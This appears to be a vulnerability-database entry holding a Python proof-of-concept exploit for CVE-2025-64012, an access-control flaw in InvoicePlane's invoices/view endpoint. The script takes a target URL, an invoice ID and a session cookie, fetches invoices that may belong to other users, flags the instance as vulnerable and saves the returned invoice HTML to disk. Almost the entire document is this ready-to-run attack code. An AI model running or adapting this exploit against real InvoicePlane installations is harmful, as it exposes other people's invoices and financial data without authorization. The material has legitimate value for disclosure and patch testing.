CVE-2025-64012 InvoicePlane invoices/view 访问控制错误漏洞

#!/usr/bin/env python3 """ CVE-2025-64012 PoC - InvoicePlane Incorrect Access Control InvoicePlane invoices/view handler fails to verify ownership before returning invoice data. """ import requests import sys from urllib.parse import urljoin def exploit_invoiceplane(target_url, invoice_id, cookies=None): """ Exploit the incorrect access control vulnerability in InvoicePlane's invoices/view endpoint. Args: target_url: Base URL of the InvoicePlane instance invoice_id: Target invoice ID to access (may belong to another user) cookies: Authentication cookies (session cookies) Returns: Response content if successful, None otherwise """ endpoint = f"invoices/view/{invoice_id}" full_url = urljoin(target_url.rstrip('/') + '/', endpoint) try: headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } response = requests.get(full_url, cookies=cookies, headers=headers, timeout=10, allow_redirects=False) return response except requests.RequestException as e: print(f"[-] Request failed: {e}") return None def main(): if len(sys.argv) < 3: print(f"Usage: python3 {sys.argv[0]} <target_url> <invoice_id> [session_cookie]") print(f"Example: python3 {sys.argv[0]} http://localhost:8080 1234 PHPSESSID=abc123") sys.exit(1) target_url = sys.argv[1] invoice_id = sys.argv[2] cookies = {} if len(sys.argv) > 3: cookie_str = sys.argv[3] if '=' in cookie_str: name, value = cookie_str.split('=', 1) cookies[name] = value print(f"[*] Targeting: {target_url}") print(f"[*] Attempting to access invoice ID: {invoice_id}") response = exploit_invoiceplane(target_url, invoice_id, cookies) if response: print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: # Check if sensitive invoice data is returned if 'invoice' in response.text.lower() or 'amount' in response.text.lower(): print("[!] VULNERABLE: Invoice data exposed without ownership verification!") print(f"[*] Response length: {len(response.text)} bytes") # Save response for analysis with open(f'invoice_{invoice_id}_response.html', 'w') as f: f.write(response.text) print(f"[*] Response saved to invoice_{invoice_id}_response.html") else: print("[-] No invoice data found in response") else: print(f"[-] Unexpected status code: {response.status_code}") if __name__ == '__main__': main()